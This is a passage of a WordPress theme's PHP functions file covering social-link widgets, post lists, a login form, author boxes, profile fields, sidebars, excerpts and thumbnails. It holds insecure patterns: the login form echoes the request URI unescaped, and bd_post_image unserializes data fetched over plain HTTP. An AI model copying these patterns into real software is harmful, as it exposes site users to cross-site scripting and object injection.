title="myspace"> myspace </a> </li> <?php } ?> <?php if(bdayh_get_option('reddit_url') != '') { ?> <li class="reddit"> <a href="<?php echo bdayh_get_option('reddit_url'); ?>" title="reddit"> reddit </a> </li> <?php } ?> <?php if(bdayh_get_option('behance_url') != '') { ?> <li class="behance"> <a href="<?php echo bdayh_get_option('behance_url'); ?>" title="behance"> behance </a> </li> <?php } ?> <?php if(bdayh_get_option('youtube_url') != '') { ?> <li class="youtube"> <a href="<?php echo bdayh_get_option('youtube_url'); ?>" title="youtube"> youtube </a> </li> <?php } ?> <?php if(bdayh_get_option('twitter_url') != '') { ?> <li class="twitter"> <a href="<?php echo bdayh_get_option('twitter_url'); ?>" title="twitter"> twitter </a> </li> <?php } ?> <?php if(bdayh_get_option('rss_url') != '') { ?> <li class="rss"> <a href="<?php echo bdayh_get_option('rss_url'); ?>" title="rss"> rss </a> </li> <?php } ?> <?php if(bdayh_get_option('pinterest_url') != '') { ?> <li class="pinterest"> <a href="<?php echo bdayh_get_option('pinterest_url'); ?>" title="pinterest"> pinterest </a> </li> <?php } ?> <?php if(bdayh_get_option('gplus_url') != '') { ?> <li class="googleplus"> <a href="<?php echo bdayh_get_option('gplus_url'); ?>" title="googleplus"> googleplus </a> </li> <?php } ?> <?php if(bdayh_get_option('flickr_url') != '') { ?> <li class="flickr"> <a href="<?php echo bdayh_get_option('flickr_url'); ?>" title="flickr"> flickr </a> </li> <?php } ?> <?php if(bdayh_get_option('facebook_url') != '') { ?> <li class="facebook"> <a href="<?php echo bdayh_get_option('facebook_url'); ?>" title="facebook"> facebook </a> </li> <?php } ?> </ul><!-- Social/--> <?php } ?> <?php } /** * * Widget Social * */ function widget_social(){ ?> <ul class="widget_social"> <?php if(bdayh_get_option('linkedin_url') != '') { ?> <li class="linkedin"> <a href="<?php echo bdayh_get_option('linkedin_url'); ?>" title="linkedin"> linkedin </a> </li> <?php } ?> <?php if(bdayh_get_option('digg_url') != '') { ?> <li class="digg"> <a href="<?php echo bdayh_get_option('digg_url'); ?>" title="digg"> digg </a> </li> <?php } ?> <?php if(bdayh_get_option('foursquare_url') != '') { ?> <li class="foursquare"> <a href="<?php echo bdayh_get_option('foursquare_url'); ?>" title="foursquare"> foursquare </a> </li> <?php } ?> <?php if(bdayh_get_option('instagram_url') != '') { ?> <li class="instagram"> <a href="<?php echo bdayh_get_option('instagram_url'); ?>" title="instagram"> instagram </a> </li> <?php } ?> <?php if(bdayh_get_option('vimeo_url') != '') { ?> <li class="vimeo"> <a href="<?php echo bdayh_get_option('vimeo_url'); ?>" title="vimeo"> vimeo </a> </li> <?php } ?> <?php if(bdayh_get_option('tumblr_url') != '') { ?> <li class="tumblr"> <a href="<?php echo bdayh_get_option('tumblr_url'); ?>" title="tumblr"> tumblr </a> </li> <?php } ?> <?php if(bdayh_get_option('blogger_url') != '') { ?> <li class="blogger"> <a href="<?php echo bdayh_get_option('blogger_url'); ?>" title="blogger"> blogger </a> </li> <?php } ?> <?php if(bdayh_get_option('deviantart_url') != '') { ?> <li class="deviantart"> <a href="<?php echo bdayh_get_option('deviantart_url'); ?>" title="deviantart"> deviantart </a> </li> <?php } ?> <?php if(bdayh_get_option('envato_url') != '') { ?> <li class="envato"> <a href="<?php echo bdayh_get_option('envato_url'); ?>" title="envato"> envato </a> </li> <?php } ?> <?php if(bdayh_get_option('skype_url') != '') { ?> <li class="skype"> <a href="skype:<?php echo bdayh_get_option('skype_url'); ?>?call" title="skype"> skype </a> </li> <?php } ?> <?php if(bdayh_get_option('myspace_url') != '') { ?> <li class="myspace"> <a href="<?php echo bdayh_get_option('myspace_url'); ?>" title="myspace"> myspace </a> </li> <?php } ?> <?php if(bdayh_get_option('reddit_url') != '') { ?> <li class="reddit"> <a href="<?php echo bdayh_get_option('reddit_url'); ?>" title="reddit"> reddit </a> </li> <?php } ?> <?php if(bdayh_get_option('behance_url') != '') { ?> <li class="behance"> <a href="<?php echo bdayh_get_option('behance_url'); ?>" title="behance"> behance </a> </li> <?php } ?> <?php if(bdayh_get_option('youtube_url') != '') { ?> <li class="youtube"> <a href="<?php echo bdayh_get_option('youtube_url'); ?>" title="youtube"> youtube </a> </li> <?php } ?> <?php if(bdayh_get_option('twitter_url') != '') { ?> <li class="twitter"> <a href="<?php echo bdayh_get_option('twitter_url'); ?>" title="twitter"> twitter </a> </li> <?php } ?> <?php if(bdayh_get_option('rss_url') != '') { ?> <li class="rss"> <a href="<?php echo bdayh_get_option('rss_url'); ?>" title="rss"> rss </a> </li> <?php } ?> <?php if(bdayh_get_option('pinterest_url') != '') { ?> <li class="pinterest"> <a href="<?php echo bdayh_get_option('pinterest_url'); ?>" title="pinterest"> pinterest </a> </li> <?php } ?> <?php if(bdayh_get_option('gplus_url') != '') { ?> <li class="googleplus"> <a href="<?php echo bdayh_get_option('gplus_url'); ?>" title="googleplus"> googleplus </a> </li> <?php } ?> <?php if(bdayh_get_option('flickr_url') != '') { ?> <li class="flickr"> <a href="<?php echo bdayh_get_option('flickr_url'); ?>" title="flickr"> flickr </a> </li> <?php } ?> <?php if(bdayh_get_option('facebook_url') != '') { ?> <li class="facebook"> <a href="<?php echo bdayh_get_option('facebook_url'); ?>" title="facebook"> facebook </a> </li> <?php } ?> </ul><!-- Social/--> <?php } /** * * News In Picture * */ function bd_news_pic($order , $numberOfPosts = 9 , $cats = 1 ){ global $post; $orig_post = $post; $lastPosts = get_posts( $args = array('numberposts' => $numberOfPosts, 'category' => $cats )); get_posts('category='.$cats.'&numberposts='.$numberOfPosts); echo '<div class="news_pic">'; foreach($lastPosts as $post): setup_postdata($post); ?> <?php $img_w = 55; $img_h = 55; $thumb = bd_post_image('full'); $image = aq_resize( $thumb, $img_w, $img_h, true ); $alt = get_the_title(); $link = get_permalink(); if (strpos(bd_post_image(), 'youtube')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'vimeo')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'dailymotion')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } else { if($image) : echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. $image .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; endif; } ?> <?php endforeach; echo'</div>'; $post = $orig_post; } /** * * Latest Pots Cat * */ function cherry_last_posts_cat($numberOfPosts = 5 , $thumb = true , $cats = 1){ global $post; $orig_post = $post; $lastPosts = get_posts('category='.$cats.'&numberposts='.$numberOfPosts); foreach($lastPosts as $post): setup_postdata($post); ?> <li> <?php $img_w = 55; $img_h = 55; $thumb = bd_post_image('full'); $image = aq_resize( $thumb, $img_w, $img_h, true ); $alt = get_the_title(); $link = get_permalink(); if (strpos(bd_post_image(), 'youtube')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'vimeo')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'dailymotion')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } else { if($image) : echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. $image .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; endif; } ?> <h3><a href="<?php the_permalink(); ?>"><?php the_title();?></a></h3> <span class="date"><?php the_time(get_option('date_format')); ?></span> <span class="post-rat"><?php echo bd_wp_post_rate(); ?></span> </li> <?php endforeach; $post = $orig_post; } /** * * Popular * */ function AGS_popular_posts($pop_posts = 5 , $thumb = true){ global $wpdb , $post; $orig_post = $post; $popularposts = "SELECT ID,post_title,post_date,post_author,post_content,post_type FROM $wpdb->posts WHERE post_status = 'publish' AND post_type = 'post' ORDER BY comment_count DESC LIMIT 0,".$pop_posts; $posts = $wpdb->get_results($popularposts); if($posts){ global $post; foreach($posts as $post){ setup_postdata($post); ?> <li> <?php $img_w = 55; $img_h = 55; $thumb = bd_post_image('full'); $image = aq_resize( $thumb, $img_w, $img_h, true ); $alt = get_the_title(); $link = get_permalink( $post->ID ); if (strpos(bd_post_image(), 'youtube')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'vimeo')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'dailymotion')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } else { if($image) : echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. $image .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; endif; } ?> <h3><a href="<?php echo get_permalink( $post->ID ) ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'bd' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php echo the_title(); ?></a></h3> <span class="date"><?php the_time(get_option('date_format')); ?></span> <span class="post-rat"><?php echo bd_wp_post_rate(); ?></span> </li> <?php } } $post = $orig_post; } /** * * Comments * */ function cherry_commented($comment_posts = 5 , $avatar_size = 55){ $comments = get_comments('status=approve&number='.$comment_posts); foreach ($comments as $comment) { if(isset($comment->ID)){ echo $comment->ID; } ?> <li> <div class="post_thumbnail"><?php echo get_avatar( $comment, $avatar_size ); ?></div> <h3><a href="<?php echo get_permalink($comment->comment_post_ID ); ?>#comment-<?php echo $comment->comment_ID; ?>"><?php echo strip_tags($comment->comment_author); ?> : <?php echo wp_html_excerpt( $comment->comment_content, 67 ); ?> ...</a></h3> </li> <?php } } /** * * Recent * */ function cherry_last_posts($numberOfPosts = 5 , $thumb = true){ global $post; $orig_post = $post; $lastPosts = get_posts('numberposts='.$numberOfPosts); foreach($lastPosts as $post): setup_postdata($post); ?> <li> <?php $img_w = 55; $img_h = 55; $thumb = bd_post_image('full'); $image = aq_resize( $thumb, $img_w, $img_h, true ); $alt = get_the_title(); $link = get_permalink(); if (strpos(bd_post_image(), 'youtube')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'vimeo')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } elseif (strpos(bd_post_image(), 'dailymotion')) { echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. bd_post_image('full') .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; } else { if($image) : echo '<div class="post_thumbnail"><a href="'. $link .'" title="'. $alt .'"><img src="'. $image .'" width="'. $img_w .'" height="'. $img_h .'" alt="'. $alt .'" /></a></div><!-- .post-image/-->' ."\n"; endif; } ?> <h3><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( '%s', 'bd' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h3> <span class="date"><?php the_time(get_option('date_format')); ?></span> <span class="post-rat"><?php echo bd_wp_post_rate(); ?></span> </li> <?php endforeach; $post = $orig_post; } /** * * Login form * */ function cherry_login_form( $login_only = 0 ){ global $user_ID, $user_identity, $user_level; if ( $user_ID ) : ?> <?php if( empty( $login_only ) ): ?> <div class="login_user"> <div class="post_thumbnail"> <?php echo get_avatar( $user_ID, $size = '79'); ?> </div> <p> <?php _e( 'Welcome' , 'bd' ) ?> <a href="<?php echo get_author_posts_url( get_the_author_meta( 'ID' ) ) ?>"><?php echo $user_identity ?></a></p> <ol class="login_list"> <li class="userWpAdmin"> <a href="<?php echo home_url() ?>/wp-admin/"><?php _e( 'Dashboard' , 'bd' ) ?></a> </li> <li class="userprofile"> <a href="<?php echo home_url() ?>/wp-admin/profile.php"><?php _e( 'Your Profile' , 'bd' ) ?></a> </li> <li class="userlogout"> <a href="<?php echo wp_logout_url(); ?>"><?php _e( 'Logout' , 'bd' ) ?></a> </li> </ol> <!-- Author social/--> <div class="author_social"> <?php if ( get_the_author_meta( 'url' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'url' , $user->ID); ?>" title="<?php echo $user_identity ?> <?php _e( 'site', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/home.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'facebook' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'facebook' ); ?>" title="<?php echo $user_identity ?><?php _e( ' on Facebook', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/facebook.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'twitter' , $user_ID) ) : ?> <a href="http://twitter.com/<?php the_author_meta( 'twitter' ); ?>" title="<?php echo $user_identity ?><?php _e( ' on Twitter', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/twitter.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'google' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'google' ); ?>" title="<?php echo $user_identity ?><?php _e( ' on Google+', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/gplus.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'linkedin' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'linkedin' , $user_ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on Linkedin', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/linkedin.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'pinterest' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'pinterest' , $user->ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on Pinterest', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/pinterest.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'youtube' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'youtube' , $user->ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on YouTube', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/youtube.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'flickr' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'flickr' , $user->ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on Flickr', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/flickr.png" alt="" /> </a> <?php endif ?> </div> </div> <?php endif; ?> <?php else: ?> <div class="login_form"> <form action="<?php echo home_url() ?>/wp-login.php" method="post"> <div class="username" > <input type="text" name="log" id="log" size="30" placeholder="User Name" value="<?php _e( 'Username' , 'bd' ) ?>" /> </div> <div class="password" > <input type="password" name="pwd" size="30" placeholder="Password" value="<?php _e( 'Password' , 'bd' ) ?>" /> </div> <div class="remember"> <input name="rememberme" id="rememberme" type="checkbox" checked="checked" value="forever" /> <label> <?php _e( 'Remember Me' , 'bd' ) ?> </label> </div> <div class="go"> <button value="<?php _e( 'Login' , 'bd' ) ?>" name="Submit" type="submit"> <?php _e( 'Login' , 'bd' ) ?> </button> <input type="hidden" name="redirect_to" value="<?php echo $_SERVER['REQUEST_URI']; ?>"/> </div> <ol class="login_list"> <li> <a href="<?php echo home_url() ?>/wp-login.php?action=lostpassword"> <?php _e( 'Forgot your password?' , 'bd' ) ?> </a> </li> </ol> </form> </div> <?php endif; } /** * * Author * */ function bd_author_box($user = 10,$avatar = true , $social = true ){ if( $avatar ) : ?> <div class="post_thumbnail"> <?php echo get_avatar( get_the_author_meta( 'user_email' ), apply_filters( 'MFW_author_bio_avatar_size', 79 ) ); ?> </div> <?php endif; ?> <p> <?php the_author_meta( 'description' ); ?> </p> <!-- Author social/--> <div class="author_social"> <?php if ( get_the_author_meta( 'url' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'url' , $user->ID); ?>" title="<?php echo $user_identity ?> <?php _e( 'site', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/home.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'facebook' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'facebook' ); ?>" title="<?php echo $user_identity ?><?php _e( ' on Facebook', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/facebook.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'twitter' , $user_ID) ) : ?> <a href="http://twitter.com/<?php the_author_meta( 'twitter' ); ?>" title="<?php echo $user_identity ?><?php _e( ' on Twitter', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/twitter.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'google' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'google' ); ?>" title="<?php echo $user_identity ?><?php _e( ' on Google+', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/gplus.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'linkedin' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'linkedin' , $user_ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on Linkedin', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/linkedin.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'pinterest' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'pinterest' , $user->ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on Pinterest', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/pinterest.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'youtube' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'youtube' , $user->ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on YouTube', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/youtube.png" alt="" /> </a> <?php endif ?> <?php if ( get_the_author_meta( 'flickr' , $user_ID) ) : ?> <a href="<?php the_author_meta( 'flickr' , $user->ID); ?>" title="<?php echo $user_identity ?><?php _e( ' on Flickr', 'bd' ); ?>"> <img src="<?php echo BD_IMG; ?>/small_social_icons/flickr.png" alt="" /> </a> <?php endif ?> </div> <?php } /** * * Add user's social accounts * */ add_action( 'show_user_profile', 'cherry_show_extra_profile_fields' ); add_action( 'edit_user_profile', 'cherry_show_extra_profile_fields' ); function cherry_show_extra_profile_fields( $user ){ ?> <h3><?php _e( 'Social Networking', 'bd' ) ?></h3> <table class="form-table"> <tr> <th><label for="facebook">FaceBook URL</label></th> <td> <input type="text" name="facebook" id="facebook" value="<?php echo esc_attr( get_the_author_meta( 'facebook', $user->ID ) ); ?>" class="regular-text" /><br /> </td> </tr> <tr> <th><label for="twitter">Twitter Username</label></th> <td> <input type="text" name="twitter" id="twitter" value="<?php echo esc_attr( get_the_author_meta( 'twitter', $user->ID ) ); ?>" class="regular-text" /><br /> </td> </tr> <tr> <th><label for="google">Google + URL</label></th> <td> <input type="text" name="google" id="google" value="<?php echo esc_attr( get_the_author_meta( 'google', $user->ID ) ); ?>" class="regular-text" /><br /> </td> </tr> <tr> <th><label for="linkedin">linkedIn URL</label></th> <td> <input type="text" name="linkedin" id="linkedin" value="<?php echo esc_attr( get_the_author_meta( 'linkedin', $user->ID ) ); ?>" class="regular-text" /><br /> </td> </tr> <tr> <th><label for="pinterest">Pinterest URL</label></th> <td> <input type="text" name="pinterest" id="pinterest" value="<?php echo esc_attr( get_the_author_meta( 'pinterest', $user->ID ) ); ?>" class="regular-text" /><br /> </td> </tr> <tr> <th><label for="youtube">YouTube URL</label></th> <td> <input type="text" name="youtube" id="youtube" value="<?php echo esc_attr( get_the_author_meta( 'youtube', $user->ID ) ); ?>" class="regular-text" /><br /> </td> </tr> <tr> <th><label for="flickr">Flickr URL</label></th> <td> <input type="text" name="flickr" id="flickr" value="<?php echo esc_attr( get_the_author_meta( 'flickr', $user->ID ) ); ?>" class="regular-text" /><br /> </td> </tr> </table> <?php } /** * * Save user's social accounts * */ add_action( 'personal_options_update', 'cherry_save_extra_profile_fields' ); add_action( 'edit_user_profile_update', 'cherry_save_extra_profile_fields' ); function cherry_save_extra_profile_fields( $user_id ){ if ( !current_user_can( 'edit_user', $user_id ) ) return false; update_user_meta( $user_id, 'google', $_POST['google'] ); update_user_meta( $user_id, 'pinterest', $_POST['pinterest'] ); update_user_meta( $user_id, 'twitter', $_POST['twitter'] ); update_user_meta( $user_id, 'facebook', $_POST['facebook'] ); update_user_meta( $user_id, 'linkedin', $_POST['linkedin'] ); update_user_meta( $user_id, 'flickr', $_POST['flickr'] ); update_user_meta( $user_id, 'youtube', $_POST['youtube'] ); } /** * * Add class * */ function category_id_class($classes){ global $post; foreach((get_the_category($post->ID)) as $category) $classes[] = $category->category_nicename; return $classes; } add_filter('post_class', 'category_id_class'); add_filter('body_class', 'category_id_class'); add_filter('body_class','bd_classes'); function bd_classes($classes){ $classes[] = 'dark'; return $classes; } /** * * Register Nav Menus * */ if ( function_exists( 'register_nav_menu' ) ){ register_nav_menus( array( 'topnav' => __('Top Nav', 'bd'), ) ); register_nav_menus( array( 'nav' => __('Nav', 'bd'), ) ); } function bd_nav_fallback(){ echo '<div class="fallback">'.__( 'You can use WP menu builder to build menus' , 'bd' ).'</div>'; } /** * * Register sidebar * */ function bd_widget_title($title){ if( empty( $title ) ) return ' '; else return $title; } add_filter('widget_title', 'bd_widget_title'); if ( function_exists('register_sidebar') ){ register_sidebar(array( 'name' => 'Home Sidebar', 'description' => 'Home Sidebar.', 'before_widget' => '<div id="%1$s" class="widget %2$s"><div class="widget_container">', 'after_widget' => '</div></div><!--//end widget-->', 'before_title' => '<h3 class="widget_title">', 'after_title' => '</h3>' ) ); register_sidebar(array( 'name' => 'Article Sidebar', 'description' => 'Article Sidebar.', 'before_widget' => '<div id="%1$s" class="widget %2$s"><div class="widget_container">', 'after_widget' => '</div></div><!--//end widget-->', 'before_title' => '<h3 class="widget_title">', 'after_title' => '</h3>' ) ); register_sidebar(array( 'name' => 'Page Sidebar', 'description' => 'Page Sidebar.', 'before_widget' => '<div id="%1$s" class="widget %2$s"><div class="widget_container">', 'after_widget' => '</div></div><!--//end widget-->', 'before_title' => '<h3 class="widget_title">', 'after_title' => '</h3>' ) ); register_sidebar(array( 'name' => 'Category Sidebar', 'description' => 'Category Sidebar.', 'before_widget' => '<div id="%1$s" class="widget %2$s"><div class="widget_container">', 'after_widget' => '</div></div><!--//end widget-->', 'before_title' => '<h3 class="widget_title">', 'after_title' => '</h3>' ) ); register_sidebar(array( 'name' => 'First Footer Widget Area', 'description' => 'First Footer Widget Area', 'before_widget' => '<li id="%1$s" class="popular_posts pp-popular-posts %2$s">', 'after_widget' => '</li><!--//popular_posts-->', 'before_title' => '<h2 class="widgettitle">', 'after_title' => '</h2>' ) ); register_sidebar(array( 'name' => 'Second Footer Widget Area', 'description' => 'Second Footer Widget Area', 'before_widget' => '<li id="%1$s" class="popular_posts pp-popular-posts %2$s">', 'after_widget' => '</li><!--//popular_posts-->', 'before_title' => '<h2 class="widgettitle">', 'after_title' => '</h2>' ) ); register_sidebar(array( 'name' => 'Third Footer Widget Area', 'description' => 'Third Footer Widget Area', 'before_widget' => '<li id="%1$s" class="popular_posts pp-popular-posts %2$s">', 'after_widget' => '</li><!--//popular_posts-->', 'before_title' => '<h2 class="widgettitle">', 'after_title' => '</h2>' ) ); register_sidebar(array( 'name' => 'Fourth Footer Widget Area', 'description' => 'Fourth Footer Widget Area', 'before_widget' => '<li id="%1$s" class="popular_posts pp-popular-posts %2$s end_row">', 'after_widget' => '</li><!--//popular_posts-->', 'before_title' => '<h2 class="widgettitle">', 'after_title' => '</h2>' ) ); } /** * * Excerpt * */ /** * * Excerpt Length * */ function bd_excerpt_global_length( $length ) { if( bdayh_get_option( 'exc_length' ) ) return bdayh_get_option( 'exc_length' ); else return 70; } function bd_excerpt_home_length( $length ) { if( bdayh_get_option( 'home_exc_length' ) ) return bdayh_get_option( 'home_exc_length' ); else return 13; } function bd_excerpt(){ add_filter( 'excerpt_length', 'bd_excerpt_global_length', 999 ); echo get_the_excerpt(); } function bd_excerpt_home(){ add_filter( 'excerpt_length', 'bd_excerpt_home_length', 999 ); echo get_the_excerpt(); } function bd_remove_excerpt( $more ){ return '...'; } add_filter('excerpt_more', 'bd_remove_excerpt'); function the_excerpt_max_charlength($charlength){ $excerpt = get_the_excerpt(); $charlength++; if(strlen($excerpt)>$charlength){ $subex = substr($excerpt,0,$charlength-5); $exwords = explode(" ",$subex); $excut = -(strlen($exwords[count($exwords)-1])); if($excut<0){ echo substr($subex,0,$excut); } else { echo $subex; } } else { echo $excerpt; } } function short_title($after = '', $length){ $mytitle = explode(' ', get_the_title(), $length); if (count($mytitle)>=$length){ array_pop($mytitle); $mytitle = implode(" ",$mytitle). $after; } else { $mytitle = implode(" ",$mytitle); } return $mytitle; } function excerpt($limit){ $excerpt = explode(' ', get_the_excerpt(), $limit); if (count($excerpt)>=$limit){ array_pop($excerpt); $excerpt = implode(" ",$excerpt).'...'; } else { $excerpt = implode(" ",$excerpt); } $excerpt = preg_replace('`\[[^\]]*\]`','',$excerpt); return $excerpt; } /** * * Thumbnails * */ if ( function_exists( 'add_theme_support' )) add_theme_support( 'post-thumbnails' ); if ( function_exists( 'add_image_size' ) && !bd_get_option( 'timthumb' )){ add_image_size( 'bd1', 330, 248, true ); add_image_size( 'bd2', 108, 85, true ); add_image_size( 'bd3', 138, 111, true ); add_image_size( 'bd4', 338, 190, true ); add_image_size( 'bd5', 54, 54, true ); add_image_size( 'bd6', 261, 160, true ); add_image_size( 'bd7', 69, 69, true ); add_image_size( 'bd8', 300, 170, true ); } function bd_pin_image(){ global $post, $posts; if (has_post_thumbnail( $post->ID )): $image = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'full' ); echo $image[0]; else: echo catch_that_image(); endif; } function catch_that_image(){ global $post, $posts; $first_img = ''; ob_start(); ob_end_clean(); $output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches); if(isset($matches[1][0])){ $first_img = $matches[1][0]; } else { $first_img = BD_IMG .'/default_thumb.png'; } return $first_img; } function bd_post_image($size = 'thumbnail'){ global $post; $image = ''; $image_id = get_post_thumbnail_id($post->ID); $image = wp_get_attachment_image_src($image_id, $size); $image = $image[0]; if ($image) return $image; $type = get_post_meta($post->ID, 'cherry_article_type', true); $vtype = get_post_meta($post->ID, 'cherry_video_type', true); $vId = get_post_meta($post->ID, 'cherry_video_id', true); if($vId != ''){ if($vtype == 'youtube'){ $image = 'http://img.youtube.com/vi/'.$vId.'/0.jpg'; } elseif($vtype == 'vimeo'){ $hash = unserialize(file_get_contents("http://vimeo.com/api/v2/video/$vId.php")); $image = $hash[0]['thumbnail_large']; } elseif ($vtype == 'daily'){ $image = 'http://www.dailymotion.com/thumbnail/video/'.$vId; } } if ($image) return $image; return bd_get_first_image(); } function bd_get_first_image(){ global $post, $posts; $first_img = ''; ob_start(); ob_end_clean(); $output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches); if(isset($matches[1][0])){ $first_img = $matches[1][0]; } else { $first_img = BD_IMG .'/default_thumb.png'; } return $first_img; } /** * User Rating */ if (!class_exists('user_rating')) { class user_rating { public $current_rating; public $current_position; public $count; function __construct() { if (is_single()) { $this->retrieve_values(); } add_action('wp_ajax_bd_rating', array(&$this, 'sync_rating')); add_action('wp_ajax_nopriv_bd_rating', array(&$this, 'sync_rating')); add_action('wp_enqueue_scripts', array(&$this, 'load_scripts')); } public function load_scripts() { global $post; if ($post) { wp_localize_script('jquery', 'bd_script', array( 'post_id' => $post->ID, 'ajaxurl' => admin_url('admin-ajax.php') ) ); } } private function retrieve_values() { $current_rating = get_post_meta(get_the_ID(), 'current_rating', true); if (!$current_rating) { $current_rating = '0'; } $this->current_rating = $current_rating; $current_position = get_post_meta(get_the_ID(), 'current_position', true); if (!$current_position) { $current_position = 0; } $this->current_position = $current_position; $count = 